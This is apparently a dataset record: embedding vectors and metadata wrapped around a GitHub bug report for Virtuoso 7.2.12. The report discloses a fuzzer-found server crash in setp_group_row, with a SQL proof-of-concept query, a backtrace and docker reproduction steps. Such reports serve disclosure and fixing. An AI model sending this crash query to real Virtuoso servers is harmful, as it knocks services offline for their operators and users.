-0.02339877001941204, -0.008375047706067562, 0.007383453194051981, -0.002270322758704424, -0.0062919859774410725, -0.0026680303271859884, 0.004751091357320547, -0.014067796990275383, -0.03966376930475235, 0.016008183360099792, 0.028577886521816254, -0.02285660244524479, 0.015565888956189156, 0.0007013388676568866, -0.010636452585458755, 0.00013966586266178638, 0.005432366859167814, 0.013967923820018768, 0.003038986586034298, -0.032986558973789215, 0.019303984940052032, -0.005418098997324705, 0.01229148730635643, 0.02051672525703907, -0.021030357107520103, 0.017463471740484238, 0.023184755817055702, -0.017363598570227623, 0.021715199574828148, -0.001227008644491434, -0.014531492255628109, -0.017277993261814117, -0.0006349056493490934, -0.002787521108984947, 0.015223467722535133, -0.012655310332775116, -0.013525630347430706, 0.0020277744624763727, 0.0030853559728711843, -0.01190626434981823, 0.007661669980734587, 0.00615287758409977, -0.002341660438105464, 0.01142116729170084, 0.011656582355499268, -0.009701929055154324, 0.009081291034817696, -0.01877608522772789, -0.003367139957845211, 0.017648950219154358, -0.004048414994031191, -0.03584006801247597, 0.005881794262677431, 0.0036917265970259905, 0.015979647636413574, -0.01585123874247074, 0.009045621380209923, -0.0007031222921796143, -0.002311341930180788, 0.014395950362086296, 0.012106009759008884, -0.0007833772688172758, -0.014067796990275383, 0.0034063756465911865, 0.0016309584025293589, -0.007347784470766783, 0.036696117371320724, -0.006184979807585478, 0.007675937842577696, -0.007333516608923674, -0.0115139065310359, 0.029904767870903015, -0.007754409220069647, -0.000009112278348766267, -0.014189071021974087, -0.00012785055150743574, -0.038807716220617294, -0.004198224283754826, 0.012141678482294083, 0.004251727368682623, 0.02073073945939541, 0.004658352583646774, 0.028178395703434944, 0.02921992726624012, -0.019089970737695694, -0.011849193833768368, 0.006691477261483669, -0.012612507678568363, 0.0014231873210519552, -0.01936105452477932, -0.023912400007247925, 0.01739213429391384, -0.00890294648706913, 0.04454326629638672, -0.02610960230231285, 0.00526472320780158, 0.0005109563353471458, 0.01800563745200634, 0.00479032751172781, -0.01857634074985981, -0.008489187806844711, 0.009844603948295116, -0.0013250979827716947, -0.0010986007982864976, 0.00019450673426035792, -0.019118506461381912, -0.02553890086710453, -0.011192887090146542, 0.0038879052735865116, 0.014110599644482136, -0.03347165510058403, -0.023127686232328415, -0.00304433680139482, -0.00018603538046590984, 0.016550349071621895, 0.013168941251933575, -0.004023446701467037, 0.004380135331302881, -0.005674914922565222, 0.003927140962332487, -0.0032672672532498837, -0.007001796271651983, -0.018875958397984505, 0.006991095840930939, 0.00988740660250187, 0.011257090605795383, 0.005300391931086779, -0.022414308041334152, 0.019232647493481636, -0.028478015214204788, 0.02284233458340168, -0.00881020724773407, -0.03238731995224953, -0.0010138872312381864, 0.006934025324881077, 0.0012047155760228634, 0.003481280291453004, -0.009359507821500301, -0.000020634990505641326, 0.00141516188159585, -0.024311892688274384, 0.02145838364958763, 0.007319249212741852, 0.031103242188692093, 0.004019880201667547, 0.005995934829115868, 0.021914944052696228, -0.01094320509582758, 0.0021062458399683237, 0.006944726221263409, -0.022985011339187622, -0.013425757177174091, 0.01104307733476162, -0.012583971954882145, -0.012962061911821365, 0.0054359338246285915, 0.004815295338630676, -0.025110874325037003, 0.024283356964588165, 0.012626774609088898, 0.006869821809232235, 0.007882816717028618, 0.014652766287326813, -0.002150831976905465, -0.004009179305285215, -0.014766906388103962, 0.002700132317841053, -0.00251465430483222, -0.012705245986580849, -0.014453019946813583, -0.01482397597283125, -0.0042588612996041775, -0.0015774552011862397, 0.018076976761221886, 0.008738869801163673, -0.014003592543303967, 0.0016933789011090994, -0.008325111120939255, -0.0010825498029589653, 0.004690454341471195, 0.005970966536551714, 0.003998478874564171, -0.0010094286408275366, 0.023170487955212593, 0.0000674921611789614, -0.0008021033718250692, 0.0027821706607937813, -0.006777082569897175, -0.007333516608923674, -0.012106009759008884, -0.0009880273137241602, -0.00038945931009948254, 0.016150858253240585, 0.007832881063222885, 0.0024718516506254673, 0.011827792972326279, -0.002420131815597415, -0.016207927837967873, 0.02573864534497261, -0.0028107059188187122, -0.031845156103372574, 0.007818613201379776, 0.01931825280189514, 0.0023933802731335163, 0.0066486746072769165, -0.0007098102360032499, 0.00552153866738081, -0.0022079022601246834, 0.005350328516215086, 0.022956475615501404, 0.0043052309192717075, -0.014167669229209423, 0.00046458683209493756, -0.02187214232981205, -0.0024219152983278036, 0.016536081209778786, 0.000341083446983248, 0.011777856387197971, 0.008175301365554333, -0.003022935474291444, -0.01500945445150137, 0.016593150794506073, -0.01121428795158863, -0.010479509830474854, 0.005318226292729378, 0.0015979647869244218, 0.00813249871134758, 0.026965655386447906, 0.029162855818867683, 0.0071908412501215935, -0.002329176291823387, 0.02222883142530918, 0.011970467865467072, -0.00749759329482913, 0.0332719087600708, -0.0013473910512402654, -0.0007066891994327307, -0.021144498139619827, 0.008325111120939255, -0.015565888956189156, -0.027336610481142998, 0.011378364637494087, -0.04103345051407814, 0.042659953236579895, 0.005057843867689371, 0.01700690947473049, -0.004672619979828596, -0.013447158969938755, 0.010593649931252003, 0.002532488666474819, -0.015266270376741886, -0.016593150794506073, -0.013860917650163174, -0.005485869944095612, 0.00023162462457548827, -0.002412998117506504, -0.021529721096158028, 0.012369959615170956, 0.016322068870067596, 0.01916131004691124, -0.024882594123482704, 0.01295492798089981, 0.007790077943354845, -0.02864922396838665, -0.0068484204821288586, -0.0011396199697628617, -0.00658090366050601, 0.01152817439287901, -0.016978375613689423, 0.013104737736284733, 0.0007998740766197443, 0.0020473923068493605, -0.021529721096158028, 0.024440299719572067, 0.008467786014080048, 0.0037523636128753424, -0.01162091363221407, 0.021130230277776718, -0.0004532173916231841, -0.015095059759914875, 0.011449703015387058, 0.00735491793602705, -0.002473635133355856, -0.03113177791237831, -0.008210971020162106, 0.019432391971349716, 0.0071409051306545734, 0.0015025505563244224, 0.023084882646799088, 0.009837470017373562, 0.002025990979745984, 0.009894540533423424, 0.007230076938867569, 0.0004904467496089637, -0.0211016945540905, 0.00046324924915097654, 0.02070220373570919 ]
null
null
null
null
null
null
null
null
null
[ "openlink", "virtuoso-opensource" ]
Fuzzer: Virtuoso 7.2.12 crashed at `setp_group_row`. It can also be reproduced with Version 7.2.13-dev.3239-pthreads as of Mar 17 2024 (da40b02). PoC: ```SQL SELECT x FROM ( SELECT x FROM ( SELECT 0 x ) x UNION SELECT ( LOG ( 1073741824 ) / ( 1024 ) ) ) x GROUP BY CUBE ( 1 ) ORDER BY AVG ( x ); ``` backtrace: ```c #0 0x532cf2 (setp_group_row+0xd72) #1 0x63ca02 (setp_node_run+0x6e2) #2 0x63d263 (setp_node_input+0x33) #3 0x7b912e (qn_input+0x3ce) #4 0x7c583d (gs_union_node_input+0x7d) #5 0x7b912e (qn_input+0x3ce) #6 0x7b9596 (qn_send_output+0x236) #7 0x82c545 (subq_node_vec_input+0x4a5) #8 0x7b912e (qn_input+0x3ce) #9 0x7c68fb (fun_ref_node_input+0x36b) #10 0x7b912e (qn_input+0x3ce) #11 0x7c68fb (fun_ref_node_input+0x36b) #12 0x7b912e (qn_input+0x3ce) #13 0x7b9596 (qn_send_output+0x236) #14 0x82bd7d (set_ctr_vec_input+0x99d) #15 0x7b912e (qn_input+0x3ce) #16 0x7ca91b (qr_exec+0x11db) #17 0x7d82b6 (sf_sql_execute+0x11a6) #18 0x7d8dbe (sf_sql_execute_w+0x17e) #19 0x7e1a7d (sf_sql_execute_wrapper+0x3d) #20 0xe2a11c (future_wrapper+0x3fc) #21 0xe31a1e (_thread_boot+0x11e) #22 0x7f2ed0a43609 (start_thread+0xd9) #23 0x7f2ed0813353 (clone+0x43) ``` ways to reproduce (write poc to the file /tmp/test.sql first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ```
Fuzzer: Virtuoso 7.2.12 crashed at `setp_group_row`
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1257/comments
0
2024-03-18T12:01:14
2024-03-22T10:51:01Z
https://github.com/openlink/virtuoso-opensource/issues/1257
2,192,013,811
1,257
false
This is a GitHub Issue repo:virtuoso-opensource owner:openlink Title : Fuzzer: Virtuoso 7.2.12 crashed at `setp_group_row` Issue date: --- start body --- Fuzzer: Virtuoso 7.2.12 crashed at `setp_group_row`. It can also be reproduced with Version 7.2.13-dev.3239-pthreads as of Mar 17 2024 (da40b02). PoC: ```SQL SELECT x FROM ( SELECT x FROM ( SELECT 0 x ) x UNION SELECT ( LOG ( 1073741824 ) / ( 1024 ) ) ) x GROUP BY CUBE ( 1 ) ORDER BY AVG ( x ); ``` backtrace: ```c #0 0x532cf2 (setp_group_row+0xd72) #1 0x63ca02 (setp_node_run+0x6e2) #2 0x63d263 (setp_node_input+0x33) #3 0x7b912e (qn_input+0x3ce) #4 0x7c583d (gs_union_node_input+0x7d) #5 0x7b912e (qn_input+0x3ce) #6 0x7b9596 (qn_send_output+0x236) #7 0x82c545 (subq_node_vec_input+0x4a5) #8 0x7b912e (qn_input+0x3ce) #9 0x7c68fb (fun_ref_node_input+0x36b) #10 0x7b912e (qn_input+0x3ce) #11 0x7c68fb (fun_ref_node_input+0x36b) #12 0x7b912e (qn_input+0x3ce) #13 0x7b9596 (qn_send_output+0x236) #14 0x82bd7d (set_ctr_vec_input+0x99d) #15 0x7b912e (qn_input+0x3ce) #16 0x7ca91b (qr_exec+0x11db) #17 0x7d82b6 (sf_sql_execute+0x11a6) #18 0x7d8dbe (sf_sql_execute_w+0x17e) #19 0x7e1a7d (sf_sql_execute_wrapper+0x3d) #20 0xe2a11c (future_wrapper+0x3fc) #21 0xe31a1e (_thread_boot+0x11e) #22 0x7f2ed0a43609 (start_thread+0xd9) #23 0x7f2ed0813353 (clone+0x43) ``` ways to reproduce (write poc to the file /tmp/test.sql first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ``` --- end body ---
1,842
[ -0.024207523092627525, -0.010500947944819927, -0.009286259301006794, 0.0011643761536106467, 0.0466325469315052, 0.032056283205747604, -0.011097511276602745, 0.037231285125017166, -0.004955786280333996, 0.028764404356479645, -0.007978132925927639, -0.01249188743531704, 0.004147191531956196, 0.010910635814070702, -0.005103129893541336, 0.02081502042710781, -0.04234879091382027, 0.008287196047604084, -0.038582537323236465, -0.03027378022670746, 0.03015878051519394, 0.003917191177606583, -0.03892754018306732, 0.04338379204273224, -0.0032595344819128513, 0.0022371115628629923, 0.002416799310594797, -0.004068129230290651, -0.0040789102204144, 0.02760002762079239, 0.007489382289350033, 0.01814126782119274, 0.008294383063912392, 0.00029491240275092423, 0.04600004479289055, -0.005358286667615175, 0.04447629302740097, 0.05255505070090294, 0.0065729753114283085, 0.030647531151771545, -0.0024832836352288723, -0.007151569705456495, -0.020024394616484642, 0.049076300114393234, -0.0032649252098053694, 0.0030780499801039696, 0.00822969526052475, 0.0060410997830331326, -0.032171282917261124, 0.011226885952055454, -0.0031571125146001577, -0.007475007325410843, -0.0005736529128625989, -0.04554004594683647, -0.02310064807534218, -0.04835754632949829, 0.027384402230381966, 0.039933789521455765, 0.018615642562508583, 0.017767516896128654, -0.018126893788576126, -0.025558775290846825, -0.006997038144618273, 0.02090127021074295, 0.0002675100404303521, 0.049162548035383224, -0.01243438757956028, -0.01006969716399908, -0.030503779649734497, 0.008193758316338062, -0.014950014650821686, -0.04042254015803337, 0.03559253364801407, 0.039847537875175476, 0.036052536219358444, -0.01086032297462225, 0.026004400104284286, 0.01155032403767109, -0.04873129725456238, -0.0015848453622311354, -0.03654128685593605, 0.042377542704343796, -0.05494130402803421, 0.035822536796331406, 0.045195043087005615, -0.0176668930798769, -0.04582754522562027, -0.07998257875442505, -0.022439397871494293, -0.008301571011543274, 0.008617821149528027, 0.024408774450421333, 0.00911375880241394, 0.009501884691417217, 0.0008741805795580149, -0.005387036595493555, -0.030360030010342598, -0.0005866802530363202, -0.05379130318760872, 0.02310064807534218, -0.019449394196271896, -0.014921264722943306, 0.043872542679309845, -0.005469692870974541, 0.02137564681470394, 0.02301439829170704, -0.007690632715821266, 0.018543768674135208, 0.023143772035837173, 0.13213513791561127, 0.025156274437904358, -0.0045065670274198055, -0.006626881659030914, -0.014022826217114925, -0.0030007841996848583, -0.03516128659248352, 0.026608150452375412, 0.002612658776342869, -0.05669505521655083, -0.019377518445253372, -0.00575359957292676, -0.04289504140615463, -0.021965021267533302, -0.020599395036697388, -0.04674754664301872, 0.03429878503084183, 0.002510236809030175, -0.01146407425403595, -0.04988129809498787, -0.005203755106776953, -0.01336157601326704, -0.038323789834976196, -0.013835950754582882, -0.032315030694007874, 0.015941889956593513, -0.018701894208788872, -0.023301897570490837, 0.012980638071894646, 0.014748764224350452, -0.014216888695955276, -0.05192255228757858, 0.0033511752262711525, 0.0196937695145607, -0.028793154284358025, 0.013512513600289822, 0.00812907051295042, -0.03159628063440323, -0.02245377190411091, 0.00887657143175602, 0.022238146513700485, 0.004136410541832447, -0.015266264788806438, 0.039876289665699005, 0.012017511762678623, 0.0060231308452785015, -0.008768758736550808, 0.01887439377605915, 0.020829396322369576, -0.005987193435430527, -0.026737526059150696, -0.02048439532518387, -0.033235032111406326, 0.0010143369436264038, -0.051836300641298294, -0.004776098299771547, 0.013411887921392918, 0.029382528737187386, 0.04597129672765732, -0.015941889956593513, 0.008797508664429188, -0.00883344653993845, -0.005606255494058132, 0.015395640395581722, 0.047552548348903656, -0.037202537059783936, 0.0415150411427021, -0.0036045347806066275, 0.017206892371177673, -0.016732515767216682, -0.02560190111398697, -0.028678152710199356, 0.0038273476529866457, -0.024207523092627525, 0.004650317132472992, 0.02995752915740013, 0.019880644977092743, 0.04536754637956619, 0.004337660502642393, 0.042578794062137604, 0.012592512182891369, 0.02486877515912056, -0.004316098056733608, 0.010005010291934013, -0.006105787120759487, 0.0022748459596186876, -0.018213143572211266, -0.023761898279190063, 0.015266264788806438, -0.012542200274765491, -0.04056629166007042, 0.011385011486709118, -0.038438789546489716, -0.03145253285765648, -0.007183913141489029, -0.010350010357797146, 0.030935030430555344, 0.0019298456609249115, 0.05114630237221718, 0.01966501958668232, -0.01174438651651144, 0.01346220076084137, -0.014454076997935772, 0.030762530863285065, 0.03550628572702408, -0.0472075454890728, -0.0001935011678142473, -0.027154402807354927, 0.017350642010569572, -0.024293774738907814, -0.0035308629740029573, 0.02410689927637577, -0.017853768542408943, 0.012369699776172638, -0.003502112813293934, -0.06290506571531296, -0.030676281079649925, -0.0055631306022405624, 0.008560321293771267, -0.05721255764365196, -0.006957506760954857, 0.012570950202643871, -0.01693376712501049, -0.026205651462078094, 0.01637314073741436, 0.042607542127370834, -0.016157515347003937, -0.014080326072871685, 0.006008755881339312, 0.011636573821306229, -0.00576797453686595, 0.032171282917261124, 0.03789253905415535, -0.02107377164065838, -0.00623156875371933, 0.014705639332532883, 0.06313506513834, -0.03142378106713295, -0.021231895312666893, -0.015783766284585, -0.010213447734713554, -0.030561279505491257, -0.03159628063440323, 0.01512251514941454, -0.009437196888029575, 0.044045042246580124, 0.028232527896761894, 0.020326269790530205, 0.004923442378640175, -0.011615011841058731, -0.014080326072871685, 0.009286259301006794, 0.014849389903247356, -0.03360878303647041, 0.0016423453344032168, 0.024610023945569992, 0.01589876599609852, -0.03125128149986267, -0.0073132882826030254, -0.011888137087225914, -0.02340252324938774, 0.025170650333166122, 0.007194694597274065, -0.028850654140114784, -0.0628475621342659, 0.003049299819394946, -0.029727529734373093, -0.021361270919442177, -0.00038138710078783333, 0.014310326427221298, -0.0014464857522398233, -0.007999695837497711, -0.025141900405287743, 0.004822817165404558, 0.02245377190411091, 0.04301004111766815, 0.010465010069310665, 0.03878378868103027, -0.014993139542639256, -0.011629386804997921, -0.04309629276394844, -0.0266944020986557, -0.02169189602136612, -0.025530025362968445, 0.00668078800663352, -0.02995752915740013, 0.04234879091382027, 0.015223139896988869, 0.021735021844506264, -0.010407510213553905, 0.019348768517374992, -0.026766275987029076, -0.02892252802848816, 0.005696099251508713, 0.01814126782119274, -0.067965067923069, -0.01837126910686493, -0.01614314131438732, -0.00545172393321991, -0.017767516896128654, -0.02689565159380436, 0.015481890179216862, -0.01340470090508461, -0.013692201115190983, 0.01006969716399908, -0.0028660185635089874, -0.01980876922607422, 0.017178142443299294, -0.021116895601153374, 0.000999961979687214, -0.017178142443299294, -0.045108795166015625, 0.0020394551102072, -0.08935508877038956, 0.010306885465979576, 0.07262257486581802, -0.0017259001033380628, -0.03829503804445267, 0.04177379235625267, -0.06560756266117096, 0.02442314848303795, 0.02596127614378929, -0.0302162803709507, -0.016804391518235207, -0.00978938490152359, -0.021907521411776543, -0.06986256688833237, -0.026881277561187744, -0.015539390034973621, -0.007018600590527058, -0.006206412333995104, -0.01068782340735197, 0.0380362868309021, -0.025530025362968445, -0.00811469554901123, -0.0018139471067115664, 0.023143772035837173, 0.038381289690732956, -0.03947379067540169, 0.03513253480195999, -0.017796266824007034, 0.0008463289705105126, 0.043671295046806335, -0.01702001690864563, 0.0236037727445364, 0.031855031847953796, -0.030475029721856117, -0.011025635525584221, -0.004625160712748766, 0.019593143835663795, -0.0009649228304624557, 0.018040642142295837, -0.014626576565206051, -0.002810315228998661, 0.022238146513700485, -0.029555030167102814, 0.00757563253864646, 0.03542003408074379, -0.021160021424293518, 0.017235642299056053, -0.005775162018835545, -0.07613007724285126, 0.030705031007528305, 0.0020843769889324903, -0.006846100557595491, -0.028462527319788933, -0.02110252156853676, 0.04430379346013069, -0.005085161421447992, 0.010141572915017605, 0.011737199500203133, -0.016631891950964928, -0.027887526899576187, 0.0233162734657526, -0.009940322488546371, 0.027585651725530624, 0.010651885531842709, 0.004995317663997412, 0.03139502927660942, -0.02131814695894718, -0.00794938299804926, -0.018831267952919006, 0.027916276827454567, -0.04292379319667816, -0.07003507018089294, 0.011931261979043484, 0.011284385807812214, 0.005250473972409964, 0.006749069318175316, 0.01178751140832901, -0.041083790361881256, 0.009545009583234787, 0.010896260850131512, -0.01651689223945141, -0.015251889824867249, -0.008481258526444435, 0.029051903635263443, 0.009990635327994823, 0.003313440829515457, 0.03251628205180168, -0.0025892993435263634, 0.02703940123319626, -0.03826628625392914, -0.03274628147482872, -0.002991799730807543, 0.03757628798484802, 0.038640037178993225, -0.006885631941258907, -0.022741273045539856, -0.016703765839338303, 0.02180689573287964, -0.020498771220445633, 0.011852199211716652, 0.009724697098135948, 0.021677521988749504, 0.0005597271374426782, 0.028879404067993164, -0.006925163324922323, -0.012240324169397354, 0.041486289352178574, -0.007018600590527058, 0.022094396874308586, 0.01086032297462225, -0.00786313321441412, -0.0035290659870952368, -0.0008404891123063862, -0.03521878644824028, -0.007327663712203503, 0.012168449349701405, 0.018011892214417458, -0.037490036338567734, -0.018026268109679222, 0.03550628572702408, -0.03573628515005112, -0.008179383352398872, -0.02399189956486225, 0.0016091031720861793, -0.03119378164410591, 0.011866574175655842, -0.014950014650821686, 0.01775314286351204, -0.0005570317734964192, -0.0048875049687922, -0.002535393228754401, -0.0052648489363491535, 0.00004961064405506477, 0.021131271496415138, -0.0011733605060726404, 0.009990635327994823, 0.041026290506124496, 0.005656568333506584, -0.02371877431869507, 0.031912531703710556, 0.018443142995238304, -0.005218130070716143, 0.02404939942061901, 0.036023784428834915, 0.0057823495008051395, -0.01890314370393753, -0.0005134575185365975, -0.03450003266334534, 0.00001641053859202657, 0.00715875718742609, -0.013893451541662216, 0.004168753977864981, -0.03004377894103527, 0.023028772324323654, 0.039847537875175476, -0.00033489291672594845, -0.015021889470517635, 0.0073492261581122875, -0.01811251789331436, -0.0026863308157771826, -0.01415220182389021, 0.0028139089699834585, 0.04970879852771759, 0.006501100026071072, -0.0015596890589222312, -0.03119378164410591, -0.034758783876895905, -0.0028911747504025698, 0.020383769646286964, -0.00022449728567153215, -0.04407379403710365, -0.01687626726925373, 0.011363448575139046, 0.007963757961988449, -0.029641279950737953, -0.011873762123286724, 0.029670029878616333, -0.03542003408074379, 0.021505020558834076, -0.024121273308992386, -0.01811251789331436, 0.007884695194661617, -0.013972514308989048, -0.026651276275515556, 0.0003389358753338456, 0.019449394196271896, 0.0042154728434979916, -0.009120946750044823, 0.007248600944876671, -0.06279005855321884, -0.00013330580259207636, -0.013555638492107391, -0.0161718912422657, -0.020886896178126335, 0.013879076577723026, -0.008430945686995983, 0.013102825731039047, -0.008395008742809296, -0.017293142154812813, -0.03254503384232521, -0.032056283205747604, 0.040048789232969284, 0.022626273334026337, 0.027916276827454567, 0.013181888498365879, 0.0024742993991822004, -0.002059220802038908, -0.030561279505491257, -0.0036656286101788282, 0.005534380674362183, -0.012599700130522251, 0.04197503998875618, -0.009911572560667992, 0.012161262333393097, -0.004193910397589207, 0.008423758670687675, -0.0181987676769495, -0.015525015071034431, 0.026823775842785835, 0.05514255538582802, -0.04470629617571831, -0.022712523117661476, 0.013764075934886932, 0.03953129053115845, -0.012161262333393097, 0.023258773609995842, 0.022554397583007812, -0.01901814341545105, 0.0300725307315588, -0.006871256977319717, -0.007848757319152355, -0.006687975488603115, 0.019420644268393517, -0.022439397871494293, 0.008344695903360844, 0.0350462831556797, 0.010191884823143482, 0.0030115654226392508, 0.02048439532518387, -0.006310631055384874, -0.007061725948005915, -0.0018615643493831158, -0.019679393619298935, 0.025673775002360344, -0.02369002439081669, 0.03268878161907196, -0.04473504424095154, -0.0014473842456936836, 0.029382528737187386, -0.0014994937228038907, -0.021131271496415138, -0.03424128517508507, -0.00251742429099977, 0.005433755461126566, -0.026176901534199715, -0.024495024234056473, -0.01716376654803753, -0.01333282608538866, 0.01893189363181591, -0.046920046210289, 0.004758129827678204, 0.01755189150571823, 0.0036243004724383354, -0.013167512603104115, 0.011025635525584221, -0.00002517031316529028, 0.0026198462583124638, -0.005735630635172129, -0.033091284334659576, -0.0012101965257897973, 0.00753250764682889, -0.01634439080953598, 0.03383878245949745, -0.0031696907244622707, 0.01783939264714718, 0.013749700970947742, 0.010184697806835175, -0.003705159993842244, -0.032085031270980835, -0.008258446119725704, 0.009458759799599648, -0.04283754155039787, -0.019190644845366478, 0.034615036100149155, -0.026320651173591614, -0.024911899119615555, -0.014763139188289642, 0.037145037204027176, 0.0024006273597478867, 0.002997190458700061, 0.04338379204273224, -0.031912531703710556, 0.029109403491020203, -0.0075181326828897, 0.04853004962205887, 0.021332520991563797, -0.026651276275515556, 0.034730035811662674, 0.03544878587126732, -0.039703790098428726, 0.011327511630952358, 0.010062510147690773, 0.00790625810623169, 0.038668788969516754, -0.009509071707725525, -0.0034230502787977457, -0.005042036063969135, -0.027528151869773865, -0.03935878723859787, 0.02225252240896225, 0.010443448089063168, -0.0266944020986557, -0.011097511276602745, 0.036110036075115204, 0.03001502901315689, -0.00198015826754272, 0.015352515503764153, 0.009013134054839611, -0.0005767974653281271, 0.009264696389436722, 0.029123779386281967, -0.007381569594144821, -0.033235032111406326, -0.014245639555156231, -0.0028049247339367867, 0.006878444459289312, 0.03358003497123718, 0.059512559324502945, -0.027125651016831398, 0.012247512117028236, 0.04096879065036774, 0.009005946107208729, 0.01149282418191433, -0.01814126782119274, 0.028060028329491615, 0.055832553654909134, -0.035966284573078156, -0.005106723867356777, -0.030360030010342598, -0.020125020295381546, -0.006371724884957075, 0.005922506097704172, 0.010960948653519154, 0.005095942411571741, -0.01848626881837845, -0.012966263107955456, 0.012650012969970703, 0.020714394748210907, -0.007018600590527058, 0.00009270761074731126, -0.00812907051295042, 0.008855008520185947, -0.006652037613093853, -0.03665628656744957, 0.006386099848896265, 0.014849389903247356, -0.008610633201897144, 0.022712523117661476, -0.04623004421591759, 0.011277198791503906, -0.009566571563482285, -0.00820094533264637, -0.04881754890084267, 0.005778755526989698, -0.01893189363181591, 0.028821904212236404, 0.00621719378978014, -0.0369725376367569, -0.0022407053038477898, 0.00020821309590246528, 0.02895127795636654, -0.0023808616679161787, 0.004898285958915949, -0.0008863094844855368, 0.028405027464032173, 0.0022874241694808006, -0.013354388065636158, 0.00794938299804926, -0.018558142706751823, 0.01851501874625683, 0.013426262885332108, 0.012844075448811054, 0.01104001048952341, 0.003453597193583846, -0.006817350629717112, 0.0013764075702056289, -0.005534380674362183, 0.018069392070174217, -0.011615011841058731, 0.0033529719803482294, -0.02596127614378929, -0.0066053192131221294, -0.011176574043929577, -0.02565940096974373, 0.01566876471042633, 0.025415025651454926, -0.0065729753114283085, 0.017983142286539078, -0.031912531703710556, -0.01817001774907112, -0.03162503242492676, -0.03680003806948662, -0.008093132637441158, -0.0002724514342844486, 0.0164593905210495, 0.026536276564002037, 0.006037505809217691, 0.015194389969110489, -0.014734389260411263, -0.034787535667419434, 0.03671378642320633, -0.0016019156901165843, -0.044878795742988586, 0.020973145961761475, 0.023920023813843727, -0.010364385321736336, 0.01067344844341278, 0.0057643805630505085, 0.0017232048558071256, 0.02686690166592598, 0.0038345351349562407, -0.0005188481882214546, -0.009437196888029575, 0.009480321779847145, 0.03248753398656845, -0.01449001394212246, 0.011557511053979397, 0.03395378217101097, 0.02854877896606922, 0.018615642562508583, 0.027772527188062668, -0.01704876683652401, -0.011147823184728622, -0.016100015491247177, -0.006414850242435932, -0.0038021912332624197, -0.003622503485530615, -0.012851262465119362, 0.015381265431642532, 0.01566876471042633, -0.00908500887453556, -0.006587350275367498, 0.03490253537893295, -0.012427199631929398, -0.010227822698652744, -0.017321892082691193, 0.022238146513700485, -0.007248600944876671, 0.0055882870219647884, -0.027053777128458023, 0.00455687940120697, -0.009473134763538837, 0.0198375191539526, -0.020714394748210907, 0.0071443822234869, 0.028290027752518654, 0.016301266849040985, 0.03573628515005112, -0.05241130292415619, -0.012340949848294258, -0.016890641301870346, 0.011514386162161827, -0.02298564836382866, -0.0214331466704607, 0.0021544552873820066, -0.017264392226934433, 0.006795788183808327, 0.010429073125123978, -0.016560016199946404, -0.03654128685593605, 0.01566876471042633, 0.016215015202760696, -0.014065951108932495, -0.03438503295183182, 0.014022826217114925, 0.01506501529365778, -0.03174003213644028, -0.026033150032162666, 0.030590029433369637, 0.014454076997935772, -0.02210877276957035, -0.026881277561187744, 0.0017151188803836703, -0.029842529445886612, 0.007927820086479187, 0.004632348194718361, -0.03237253054976463, 0.021706271916627884, -0.01343345083296299, -0.012190012261271477, 0.0014824233949184418, 0.017480017617344856, 0.031941283494234085, 0.014583451673388481, 0.014763139188289642, -0.025918150320649147, -0.010213447734713554, 0.013936576433479786, -0.016631891950964928, 0.026090651750564575, 0.00011174327664775774, -0.003812972456216812, -0.00786313321441412, 0.005818286910653114, 0.013979701325297356, -0.01637314073741436, 0.027470652014017105, -0.025228150188922882, 0.020973145961761475, -0.004373597912490368, -0.010321260429918766, -0.029051903635263443, -0.014022826217114925, 0.014561889693140984, 0.007209069561213255, -0.006501100026071072, 0.0038776600267738104, 0.027226276695728302, -0.016746891662478447, -0.0010412901174277067, 0.055832553654909134, 0.005074379965662956, -0.004689848516136408, -0.03228628262877464, -0.013289700262248516, 0.029497528448700905, -0.013677826151251793, -0.0035847690887749195, 0.05060005187988281, 0.01651689223945141, -0.009228759445250034, 0.009415633976459503, 0.012283449992537498, 0.029152529314160347, -0.011248448863625526, 0.0009541415493004024, 0.01242001261562109, 0.007633132394403219, -0.003214612603187561, -0.009494696743786335, -0.011018448509275913, -0.004344847984611988, 0.030446279793977737, 0.03257378190755844, -0.003899222705513239, -0.023115022107958794, 0.018083767965435982, -0.02472502365708351, -0.008962821215391159, -0.03289003297686577, 0.03530503436923027, 0.005990787409245968, -0.014791890047490597, 0.000953243114054203, -0.01957876980304718, -0.009200009517371655, -0.009041883982717991, 0.003539847210049629, -0.00881907157599926, -0.013145950622856617, -0.015395640395581722, -0.004894692450761795, -0.0047725047916173935, -0.012003136798739433, 0.0052720364183187485, -0.03312003239989281, -0.012944700196385384, -0.008574696257710457, 0.014382202178239822, -0.02366127260029316, -0.029813779518008232, -0.006468756590038538, 0.009552196599543095, 0.02492627501487732, 0.007410319987684488, 0.028419403359293938, -0.025875026360154152, -0.03401128202676773, -0.02275564707815647, -0.01589876599609852, -0.006932350806891918, 0.00028166043921373785, 0.0033637534361332655, -0.012384074740111828, 0.03148128092288971, 0.013325638137757778, -0.0036620348691940308, 0.021332520991563797, 0.03751878812909126, 0.02892252802848816, 0.018213143572211266, -0.04571254551410675, -0.01878814399242401, -0.018443142995238304, -0.013735326007008553, -0.01175876148045063, -0.006134537514299154, 0.009077821858227253, 0.014410952106118202, 0.014676889404654503, 0.030388779938220978, 0.01755189150571823, 0.013972514308989048, -0.004657504614442587, 0.014806265011429787, 0.004344847984611988, -0.009185634553432465, 0.018026268109679222, -0.012369699776172638, -0.018299393355846405, 0.006382506340742111, 0.00537984911352396, 0.025918150320649147, -0.017436891794204712, 0.02419314906001091, -0.025156274437904358, -0.029526278376579285, -0.025141900405287743, -0.03657003492116928, -0.01890314370393753, 0.013591576367616653, 0.0033529719803482294, 0.02607627585530281, 0.008042820729315281, -0.0018705487018451095, -0.023733148351311684, 0.00503484858199954, -0.001874142442829907, -0.03769128769636154, -0.028290027752518654, -0.002206564648076892, -0.02436564862728119, -0.00787750817835331, 0.0001769923692336306, -0.03260253369808197, 0.0017115251393988729, 0.0052720364183187485, 0.0161718912422657, -0.01622939109802246, 0.0034913315903395414, 0.009954697452485561, -0.011356261558830738, -0.03015878051519394, 0.02928190492093563, 